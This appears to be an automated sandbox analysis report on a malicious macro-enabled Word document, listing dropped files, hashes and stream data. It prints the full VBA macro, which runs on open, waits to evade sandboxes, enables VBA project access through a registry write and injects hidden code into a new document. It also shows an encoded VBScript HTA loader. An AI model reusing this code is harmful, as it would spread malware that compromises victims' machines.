              Preview:<HEAD><HTA:APPLICATION ID="matchpower" APPLICATIONNAME="matchpower" WINDOWSTATE="minimize" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" CAPTION="no" SHOWINTASKBAR="no" BORDER="none" SINGLEINSTANCE="yes"></HEAD><span id=lookupspan>loading...</span><script Language="VBScript.Encode" defer>..#@~^NAwAAA==6.P3MDKDP"+k;:.PH+XY@#@&Skx9GhcD+kr"+:W,!S!@#@&SkUNKARsW-n:WPR+Z!T~ +Z!T@#@&wEx1YbGx,Yn:a`4b@#@&r.~2MDWM~]+kEs+~1naD@#@&dGr:,lSr@#@&doGMPrP{~8PPKPd+xvt*@#@&il~',l~',ZtMcJLCJ,'~HbNvtSkS+*#@#@&irP{Pr~3PF@#@&i1n6D@#@&dO.:aP',l@#@&2.N~s!x^ObWx@#@&Y.6Y,x~Y.:a`EF1*G&3*ATf2bq.Wb*$+2c{vy+w&{8v82c2*Oq!8cT*+!T98ZFW*b2Acy*XvF&Z*.*qf;*{ F*&2 q98s*f*zc1G;fyG1yF+s&ycz+!lf*&+,+{lfc8+vl2 F*fFRFG!qc+flG9FyX*l +fyvF1XGG+!wq8F)Z*lc*~ FqAysT y q$8Fc+XGZ!FW*)FR!; TF)Xl&f*;X*Z*q/lv*{{wFf!8T~ *l!Wb!yF8X2FZf Wcf$y%Fy*b2cc8XXvOcRF0FTf~c{&+q&+ZX{lv*)XFF0Fz*Gc.+FyvFO*2{!2sfA2bqqls*F+FWG lT{G+cl*1F*XFF$FZX*l&f9y*FfXO qFZf;cfZcWs*F 8X*y*T*y*T$l,!~q%l*!RXXcl A *F)*~&1*2*,+A{02 cqfF*X lT+ q8Z8fcZFR*blFqbWGfoy&F+*A2scWX) ZF8F

              C:\Users\user\AppData\Local\Temp\82A08793.tmp

              Download File
              Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
              File Type:data
              Category:dropped
              Size (bytes):870
              Entropy (8bit):2.7216982607773264
              Encrypted:false
              SSDEEP:24:BrIZatKVUr0quyFLdpeXKA30Ei+rYyPjiI8xpu620:9fCUYqugdpeXTpYyPjiI8xpu65
              MD5:FDB7BDE9525D6ABEE90D0348A0308F3B
              SHA1:87AE19B8952AB8C8BB8FE2109D63D09E7441413E
              SHA-256:65DEFF9C42E47C31CA837327A695173DD29921F8CC5FC7D6923DBD617D4A8CA2
              SHA-512:F683B174074DC2480BD601D4BD7D30A87F35CF5AB03620A9CD3A6B0A32FB728D27DF3331F6A4887C0E5D1263B1CAE6678E4FA784243674E6508A278AD61BFFEC
              Malicious:false
              Reputation:low
              Preview:6.3.6.4.3.3.4.,.7.7.8.7.0.2.2.2.4.,.1.0.3.4.5.0.2.0.,.3.7.4.6.3.7.6.,.1.0.6.9.5.5.3.,.2.6.0.1.,.3.7.4.6.3.7.2.,.1.5.6.1.9.5.8.,.6.3.6.4.3.3.1.,.1.5.6.1.9.5.5.,.3.7.4.6.3.7.3.,.4.8.0.9.1.5.7.6.3.,.7.7.8.7.0.2.2.2.5.,.4.8.0.9.1.5.7.6.5.,.1.2.2.3.4.3.4.,.7.7.8.7.0.2.2.3.4.,.4.8.0.9.1.5.7.6.4.,.7.2.9.1.8.1.0.4.3.,.1.4.6.1.9.5.5.,.1.2.2.0.7.7.9.,.;.1.6.5.7.4.5.3.,.1.6.5.7.4.5.2.,.2.3.7.1.6.5.1.,.6.5.4.0.2.1.5.,.2.6.9.5.0.9.3.5.1.,.3.2.9.4.5.8.7.9.9.,.3.0.1.2.3.4.6.6.,.3.0.1.5.3.7.2.1.,.3.7.4.6.3.7.9.,.2.7.1.5.3.4.9.7.,.1.0.6.9.5.3.3.,.1.0.3.4.5.0.2.1.,.3.4.4.1.3.9.5.3.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.7.0.4.1.0.8.,.1.4.6.1.9.5.3.,.3.2.9.4.5.8.8.0.3.,.1.0.0.1.,.1.5.6.1.9.5.6.,.1.0.2.3.6.3.8.,.2.4.5.2.3.8.7.,.1.0.0.9.,.5.6.4.1.6.8.7.,.7.7.8.7.0.2.2.2.7.,.8.9.8.9.8.9.8.9.8.,.3.1.9.0.0.0.0.0.,.3.2.0.5.9.2.7.6.7.,.2.4.5.2.3.8.8.,.2.1.0.0.9.4.0.,.3.1.4.1.5.9.0.0.,.

              C:\Users\user\AppData\Local\Temp\RoYAd85faz.doc.doc (copy)

              Download File
              Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
              File Type:Microsoft Word 2007+
              Category:dropped
              Size (bytes):22553
              Entropy (8bit):7.602165097670585
              Encrypted:false
              SSDEEP:384:/i8ztnJXtkSB4/KDXNxt/ZtNNj1mlyzUeqXS50aPV6Hu9Q4kvaQvGc0i:/jJXtkSDD9xllNj1mreP50ad6O92HP
              MD5:4C0B52880E44BF99D187E8E80071596B
              SHA1:E1FE1511C1585322AAD496453CE01BAE6A344A32
              SHA-256:F7B2D9537E8100C0F78EF524F3AB73E92D9D9ABA8B37EB5A14949EFD16D1EB13
              SHA-512:E4EC3E77DDD22A8DB1E157E5176B8EFAB9A0ADF2F4991126F916C34564BFD3AA3284662A8666D8781A72A35B67FB9D0DC303DED1D2067518A0EA08A60296DEF3
              Malicious:true
              Reputation:low
              Preview:PK..........!.~8.z............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.@...&.C.W..x0.P8...D|.a;..vw.;.{{...5@U.BRf....v;...,.%...IE7.....6.T.L..[....Aa..b.A.......a.XmB*.D.N..XBH.C.......L:Po0Cy...He....*.......h...$SmDt_.UV.......,.&K...<........"!..<....9r..MX...s...7.q.*.........Fc...%w....Z..LNc..+I..........U.f.......~`.(Z.6..o...v...#U,......ERs......!.FX....R|.....wR]....G.. ^.X.v.....N^...z..{..W..v.I..u{GF.=.V.$......;.......PK..........!.........N......._rels/.rel

              C:\Users\user\AppData\Local\Temp\mso2739.tmp

              Download File
              Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
              File Type:GIF image data, version 89a, 15 x 15
              Category:dropped
              Size (bytes):663
              Entropy (8bit):5.949125862393289
              Encrypted:false
              SSDEEP:12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
              MD5:ED3C1C40B68BA4F40DB15529D5443DEC
              SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
              SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
              SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
              Malicious:false
              Reputation:high, very likely benign file
              Preview:GIF89a....w..!..MSOFFICE9.0.....sRGB......!..MSOFFICE9.0.....msOPMSOFFICE9.0Dn&P3.!..MSOFFICE9.0.....cmPPJCmp0712.........!.......,....................'..;..b...RQ.xx..................,+................................yy..;..b.........................qp.bb..........uv.ZZ.LL.......xw.jj.NN.A@....zz.mm.^_.........yw........yx.xw.RR.,*.++............................................................................................................................................................................................................8....>.......................4567...=..../0123.....<9:.()*+,-.B.@...."#$%&'....... !............C.?....A;<...HT(..;

              C:\Users\user\AppData\Local\Temp\~$YAd85faz.doc.doc

              Download File
              Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
              File Type:data
              Category:dropped
              Size (bytes):162
              Entropy (8bit):2.890812828412885
              Encrypted:false
              SSDEEP:3:EIXl+PWlllk7tqO/tlfl8tlqmyt7zM+ExKn:lzl/k0O/Cam4/dn
              MD5:A782C96ED0FC8B7422290C960402614F
              SHA1:47CBDD8328E8219C044638CF07B98E739CCEF495
              SHA-256:CFAC2DDA8DE7F78B50E872F5FF8D3F7F3AC3BB2CB4E277258E367EF3889152DE
              SHA-512:7708DA8D51E787B65483D553A3021E210DBBD884D4B4BD794AEA29C53BE31ED4207A6F686509E8119B1887094BF13440F5D86265FB5B3F6665B0654C3A8B36DB
              Malicious:false
              Preview:.user..................................................G.a.n.j.i...... .X.....<O`.....<O`.....X.......................X......u....e...^......?....e..........6...

              C:\Users\user\AppData\Local\Temp\~WRD0000.tmp

              Download File
              Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
              File Type:Microsoft Word 2007+
              Category:dropped
              Size (bytes):22553
              Entropy (8bit):7.602165097670585
              Encrypted:false
              SSDEEP:384:/i8ztnJXtkSB4/KDXNxt/ZtNNj1mlyzUeqXS50aPV6Hu9Q4kvaQvGc0i:/jJXtkSDD9xllNj1mreP50ad6O92HP
              MD5:4C0B52880E44BF99D187E8E80071596B
              SHA1:E1FE1511C1585322AAD496453CE01BAE6A344A32
              SHA-256:F7B2D9537E8100C0F78EF524F3AB73E92D9D9ABA8B37EB5A14949EFD16D1EB13
              SHA-512:E4EC3E77DDD22A8DB1E157E5176B8EFAB9A0ADF2F4991126F916C34564BFD3AA3284662A8666D8781A72A35B67FB9D0DC303DED1D2067518A0EA08A60296DEF3
              Malicious:false
              Preview:PK..........!.~8.z............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.@...&.C.W..x0.P8...D|.a;..vw.;.{{...5@U.BRf....v;...,.%...IE7.....6.T.L..[....Aa..b.A.......a.XmB*.D.N..XBH.C.......L:Po0Cy...He....*.......h...$SmDt_.UV.......,.&K...<........"!..<....9r..MX...s...7.q.*.........Fc...%w....Z..LNc..+I..........U.f.......~`.(Z.6..o...v...#U,......ERs......!.FX....R|.....wR]....G.. ^.X.v.....N^...z..{..W..v.I..u{GF.=.V.$......;.......PK..........!.........N......._rels/.rel

              C:\Users\user\AppData\Local\Temp\~WRD0001.tmp

              Download File
              Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
              File Type:Microsoft Word 2007+
              Category:dropped
              Size (bytes):27516
              Entropy (8bit):7.70082713704097
              Encrypted:false
              SSDEEP:384:/i8ztpAMlZ+vcDqSpj7UYYXNxt/ZtNNjlLcsSMiyORIoQjSYrrN3xa49Q4kvaQxE:/jnicve9xllNjlLcslBCI7a492S
              MD5:793F2291D5674537378233E57AFD4B67
              SHA1:01C2676034A8C19F84079E0A3B4E1D1C2726F5E6
              SHA-256:4836329572B4338FD61104BA9D6F2086CA335C34097E90783A90519BFE46AA4D
              SHA-512:1DAFCD05F5ED0636EFE214E2C3810B04FC6FC2A413E3598CE1100B447F9215DACD6EBB71A1841BEBBC787206A24F26B5915C8648D64CB97A54F17357CCC3B99D
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              Preview:PK..........!.~8.z............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.@...&.C.W..x0.P8...D|.a;..vw.;.{{...5@U.BRf....v;...,.%...IE7.....6.T.L..[....Aa..b.A.......a.XmB*.D.N..XBH.C.......L:Po0Cy...He....*.......h...$SmDt_.UV.......,.&K...<........"!..<....9r..MX...s...7.q.*.........Fc...%w....Z..LNc..+I..........U.f.......~`.(Z.6..o...v...#U,......ERs......!.FX....R|.....wR]....G.. ^.X.v.....N^...z..{..W..v.I..u{GF.=.V.$......;.......PK..........!.........N......._rels/.rel

              C:\Users\user\AppData\Local\Temp\~WRL0002.tmp (copy)

              Download File
              Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
              File Type:Microsoft Word 2007+
              Category:dropped
              Size (bytes):22553
              Entropy (8bit):7.602165097670585
              Encrypted:false
              SSDEEP:384:/i8ztnJXtkSB4/KDXNxt/ZtNNj1mlyzUeqXS50aPV6Hu9Q4kvaQvGc0i:/jJXtkSDD9xllNj1mreP50ad6O92HP
              MD5:4C0B52880E44BF99D187E8E80071596B
              SHA1:E1FE1511C1585322AAD496453CE01BAE6A344A32
              SHA-256:F7B2D9537E8100C0F78EF524F3AB73E92D9D9ABA8B37EB5A14949EFD16D1EB13
              SHA-512:E4EC3E77DDD22A8DB1E157E5176B8EFAB9A0ADF2F4991126F916C34564BFD3AA3284662A8666D8781A72A35B67FB9D0DC303DED1D2067518A0EA08A60296DEF3
              Malicious:false
              Preview:PK..........!.~8.z............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.@...&.C.W..x0.P8...D|.a;..vw.;.{{...5@U.BRf....v;...,.%...IE7.....6.T.L..[....Aa..b.A.......a.XmB*.D.N..XBH.C.......L:Po0Cy...He....*.......h...$SmDt_.UV.......,.&K...<........"!..<....9r..MX...s...7.q.*.........Fc...%w....Z..LNc..+I..........U.f.......~`.(Z.6..o...v...#U,......ERs......!.FX....R|.....wR]....G.. ^.X.v.....N^...z..{..W..v.I..u{GF.=.V.$......;.......PK..........!.........N......._rels/.rel

              C:\Users\user\Desktop\RoYAd85faz.doc (copy)

              Download File
              Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
              File Type:Microsoft Word 2007+
              Category:dropped
              Size (bytes):44468
              Entropy (8bit):7.83105809610787
              Encrypted:false
              SSDEEP:768:XSMfEdyzE7l7tmSLBLmxc0vFpZMHB5YCGCH9zXv0km6kyBZN:i6wyzE7l7tmSL7QFwHBggx0km6kybN
              MD5:6C9A4BAB33B7496A27AF8AAE4ABF4F5E
              SHA1:9501B5FEA6ECFFF2B5D61AA82EE7307296656657
              SHA-256:B4B939A979C2B4BD5B7FBF6F5DFBB3FF0E59B8BE04D68C7B5346D7B746E4313D
              SHA-512:3379DBBD62D2257DFF075AC89A379314DED34D266A71D55519438B6C1C3C60DC8576E2B6323C4E525A0D5328ACB533A52736781AD5CAF7FDC99546655D87629D
              Malicious:true
              Preview:PK..........!..Y.=............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................Mn.0....z...B..EQ...H.e....F..f#...;..;.d.-b3i.......ch....+v......B....k...k.Y...i..Z.1....w.}.T..Zl...)...T...OZ.-...k.@.......T..:*.g....[.vT.<..!Ic.(......Bg.....M.o[...5p../T$..]....\.q+V.j....N8.'..F.w..h4.....X...>j...ZVV.1c...$.T.7......;.<...u../0..Y....#.u.....QN]......g.jBgC$.w..>....#....0......1[.?.. ...<.1.....N..H.F. h..o.`.?c....!... ..8<_....9K.......m.......F2.'=92...a.Z4.'..a.~...

              C:\Users\user\Desktop\~$YAd85faz.doc

              Download File
              Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
              File Type:data
              Category:dropped
              Size (bytes):162
              Entropy (8bit):2.824637399168359
              Encrypted:false
              SSDEEP:3:EIXl+PWlllKBLllBqWllPl/l/flPl/RA+kFrR/uPbkJxKn:lzl/CL5qWXWxr5u5n
              MD5:D49DD152CDD7E36590D004F8A070CAF1
              SHA1:B823635D13098E0732A02EC81079B18BBE1C3B40
              SHA-256:CCC97CA6F8B638419D01AC1045F97DC6998B0B70C6A78061C215004BF7794328
              SHA-512:8A845F95E7F3D1FBB3EF246A4BAEC026513F4CF3FC81562698F3B7E9E35FF394974B31D34513169DA380362EAC3AFFE6FFD84CAD90EDEAD212C7F121885FD21D
              Malicious:false
              Preview:.user..................................................G.a.n.j.i.......P.#....<.......<......@.......................@.......f.f..e.......t..'....e..........6...

              C:\Users\user\Desktop\~WRD0000.tmp

              Download File
              Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
              File Type:Microsoft Word 2007+
              Category:dropped
              Size (bytes):44468
              Entropy (8bit):7.83105809610787
              Encrypted:false
              SSDEEP:768:XSMfEdyzE7l7tmSLBLmxc0vFpZMHB5YCGCH9zXv0km6kyBZN:i6wyzE7l7tmSL7QFwHBggx0km6kybN
              MD5:6C9A4BAB33B7496A27AF8AAE4ABF4F5E
              SHA1:9501B5FEA6ECFFF2B5D61AA82EE7307296656657
              SHA-256:B4B939A979C2B4BD5B7FBF6F5DFBB3FF0E59B8BE04D68C7B5346D7B746E4313D
              SHA-512:3379DBBD62D2257DFF075AC89A379314DED34D266A71D55519438B6C1C3C60DC8576E2B6323C4E525A0D5328ACB533A52736781AD5CAF7FDC99546655D87629D
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              Preview:PK..........!..Y.=............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................Mn.0....z...B..EQ...H.e....F..f#...;..;.d.-b3i.......ch....+v......B....k...k.Y...i..Z.1....w.}.T..Zl...)...T...OZ.-...k.@.......T..:*.g....[.vT.<..!Ic.(......Bg.....M.o[...5p../T$..]....\.q+V.j....N8.'..F.w..h4.....X...>j...ZVV.1c...$.T.7......;.<...u../0..Y....#.u.....QN]......g.jBgC$.w..>....#....0......1[.?.. ...<.1.....N..H.F. h..o.`.?c....!... ..8<_....9K.......m.......F2.'=92...a.Z4.'..a.~...

              C:\Users\user\Desktop\~WRD0000.tmp:Zone.Identifier

              Download File
              Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):26
              Entropy (8bit):3.95006375643621
              Encrypted:false
              SSDEEP:3:ggPYV:rPYV
              MD5:187F488E27DB4AF347237FE461A079AD
              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
              Malicious:true
              Preview:[ZoneTransfer]....ZoneId=0

              Static File Info

              General

              File type:Microsoft Word 2007+
              Entropy (8bit):7.9711875335075595
              TrID:
              • Word Microsoft Office Open XML Format document with Macro (52004/1) 37.96%
              • Word Microsoft Office Open XML Format document (49504/1) 36.13%
              • Word Microsoft Office Open XML Format document (27504/1) 20.07%
              • ZIP compressed archive (8000/1) 5.84%
              File name:RoYAd85faz.doc
              File size:42'814 bytes
              MD5:ab5685ebf439f61c554977df1e1cd0c3
              SHA1:715724904dfb62a68887fa3d2d6d391b32cbd7b1
              SHA256:fd78051817b5e2375c92d14588f9a4ba1adc92cc1564e55e6150ae350ed6c889
              SHA512:fc0eb6df2a25cb09f1431ac799b8d078e1dbc5e8ff664e06a5133175ff08a2068ac0bd185dc1e943dc7338ca5bc9f0de08473e117f213e5c3efb74c4bde40766
              SSDEEP:768:K5LoMrd9SPM7SVTqVZDngfIZ6DZH9A5fO3cfgw92j6pZliNEfQy/1mJW3vad:K5E+7Y+rgfIIilO3o92juiI7/1vg
              TLSH:7D13F134FC882915FBEEE73653901A5AFB720952AB4020370A6792D557CB7F00FF5899
              File Content Preview:PK.........|8Y.Y.=............[Content_Types].xml...n.0.E.......D...(,g.......F..f+>@....;...-.3/m.X.{....Y.?...aL..Z.U.Q.S^.........(....y...c....O..}.T...Zl..7)....T...OZ.-...k.@..5.......#tTR....%.....z..C..8Q\.u.U- ..( >.;.+.J..Fa.k.6._.H.'a.........V

              File Icon

              Icon Hash:35e1cc889a8a8599

              Static OLE Info

              General

              Document Type:OpenXML
              Number of OLE Files:1

              OLE File "RoYAd85faz.doc"

              Indicators
              Has Summary Info:
              Application Name:
              Encrypted Document:False
              Contains Word Document Stream:True
              Contains Workbook/Book Stream:False
              Contains PowerPoint Document Stream:False
              Contains Visio Document Stream:False
              Contains ObjectPool Stream:False
              Flash Objects Count:0
              Contains VBA Macros:True
              Summary
              Title:
              Subject:
              Author:Merey Kuandykov
              Keywords:
              Template:Normal.dotm
              Last Saved By:Merey Kuandykov
              Revion Number:36
              Total Edit Time:0
              Create Time:2023-09-28T05:41:00Z
              Last Saved Time:2023-10-09T04:26:00Z
              Number of Pages:3
              Number of Words:825
              Number of Characters:4703
              Creating Application:Microsoft Office Word
              Security:12
              Document Summary
              Number of Lines:39
              Number of Paragraphs:11
              Thumbnail Scaling Desired:false
              Company:Microsoft
              Contains Dirty Links:false
              Shared Document:false
              Changed Hyperlinks:false
              Application Version:16.0000

              Streams with VBA

              VBA File Name: ThisDocument.cls, Stream Size: 5719
              General
              Stream Path:VBA/ThisDocument
              VBA File Name:ThisDocument.cls
              Stream Size:5719
              Data ASCII:. . . . . . . . . < . . . . . . b . . . T . . . b . . . . . . . . . . . . . . P . | . . . . . . . . . . . . . . . . . . . . . . . D ' G . . = + - G . . . H . . . . . . . . . . . . . . . . . . . . ? r . h G . V . ' . . . . . . . . . . . . . . . . . . . . . . . x . . . . ? r . h G . V . ' . D ' G . . = . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . S " . . . . S . . . . . S " . . . . > " . . . . . . . . . . L . . . . . L . . . . . L . . . . . L . . . . . L . . . . . L . . . . . L . . . . . L
              Data Raw:01 16 03 00 06 00 01 00 00 3c 0a 00 00 e4 00 00 00 62 02 00 00 54 0b 00 00 62 0b 00 00 f2 11 00 00 03 00 00 00 01 00 00 00 50 0d 7c 15 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff a0 00 ff ff 00 00 9f a8 44 84 27 fd f3 47 9b c6 04 c4 ae f2 3d 9b f5 ea 2b f9 2d 8c 99 47 83 1c 88 0a ac a3 17 48 00 00 00 00 00 00 00 00 00 00 00 00 00
              VBA Code
              Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public objApp, wsl
Function danger()
        danger = ActiveDocument.Variables.Item("s2")
End Function
Function kokokokoko(namedoc)
        Set doc2 = objApp.Documents.Open(namedoc)
    doc2.Save
    doc2.Close
End Function
Sub verydanger()
        strng = "WSc" & "ript.She"
        strng = strng & "ll"
        Set wsl = CreateObject(strng)
        wsl.RegWrite "HK" & "CU\Softw" & "are\Micr" & "osoft\Of" & "fice\" & Application.Version & "\Wo" & "rd\Sec" & "urity\Acce" & "ssVBO" & "M", 1, "REG_D" & "WORD"
End Sub
Sub documeNt_opEn()
    On Error Resume Next
        ActiveDocument.Unprotect ("oikmseM#*inmowefj8349an3")
        For i = ActiveDocument.Shapes.Count To ActiveDocument.Shapes.Count + 1 - ActiveDocument.ActiveWindow.Panes(1).Pages.Count * 2 Step -1
                ActiveDocument.Shapes(i).Delete
        Next i
    ActiveDocument.Save
        sss = Now()
    While Now < sss + TimeValue("00:00:20")
        DoEvents
    Wend
        If Now() - sss < TimeValue("00:00:15") Then Exit Sub
        verydanger
    Set objApp = CreateObject("Word.Application")
    objApp.Visible = False
    Set doc = objApp.Documents.Add
    For Each vars In ActiveDocument.Variables
    doc.Variables.Add vars.Name & "ergegdr", vars
    i = i + 1
    Next
    doc.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString "Sub goods() : : End Sub" & vbCrLf & "Sub baads() : : End Sub" & vbCrLf & danger()
    tmp = wsl.ExpandEnvironmentStrings("%localapp" & "data%\T" & "emp") & "\" & ActiveDocument.Name & ".doc"
    doc.SaveAs2 tmp, 13
    doc.Close
        kokokokoko (tmp)
End Sub

              Streams

              Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 369
              General
              Stream Path:PROJECT
              CLSID:
              File Type:ASCII text, with CRLF line terminators
              Stream Size:369
              Entropy:5.302139144655809
              Base64 Encoded:True
              Data ASCII:I D = " { 0 C 7 2 1 A 6 3 - D 3 8 3 - 4 0 3 A - 9 8 2 A - 0 5 A 3 0 E 7 6 2 5 B 7 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 5 D 7 4 9 A 6 C B 7 F C F 7 F C F 7 F C F 7 F C F " . . D P B = " A A A 8 3 6 9 1 0 A 9 2 0 A 9 2 0 A " . . G C = " 7 F 7 D E 3 C C 6 D 7 4 4 3 7 5 4 3 7 5 B C " . . . . [ H o s t E x t e n d e r I n f
              Data Raw:49 44 3d 22 7b 30 43 37 32 31 41 36 33 2d 44 33 38 33 2d 34 30 33 41 2d 39 38 32 41 2d 30 35 41 33 30 45 37 36 32 35 42 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
              Stream Path: PROJECTwm, File Type: data, Stream Size: 41
              General
              Stream Path:PROJECTwm
              CLSID:
              File Type:data
              Stream Size:41
              Entropy:3.0773844850752607
              Base64 Encoded:False
              Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
              Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
              Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3235
              General
              Stream Path:VBA/_VBA_PROJECT
              CLSID:
              File Type:data
              Stream Size:3235
              Entropy:4.5261619436805
              Base64 Encoded:False
              Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D .
              Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
              Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 3509
              General
              Stream Path:VBA/__SRP_0
              CLSID:
              File Type:data
              Stream Size:3509
              Entropy:3.443885782340945
              Base64 Encoded:False
              Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ 6 . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . .
              Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 c0 02 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00
              Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 238
              General
              Stream Path:VBA/__SRP_1
              CLSID:
              File Type:data
              Stream Size:238
              Entropy:2.11560831315699
              Base64 Encoded:False
              Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . o b j A p p . . . . . . . . . . . . . . . . w s l . . . . . . . . . . . . . . . . n a m e d o c V . . . . . . . . . . . . . . .
              Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 06 00 00 00 00 00 00 09 11 04 00 00 00 00
              Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 3441
              General
              Stream Path:VBA/__SRP_2
              CLSID:
              File Type:data
              Stream Size:3441
              Entropy:3.681817370422095
              Base64 Encoded:False
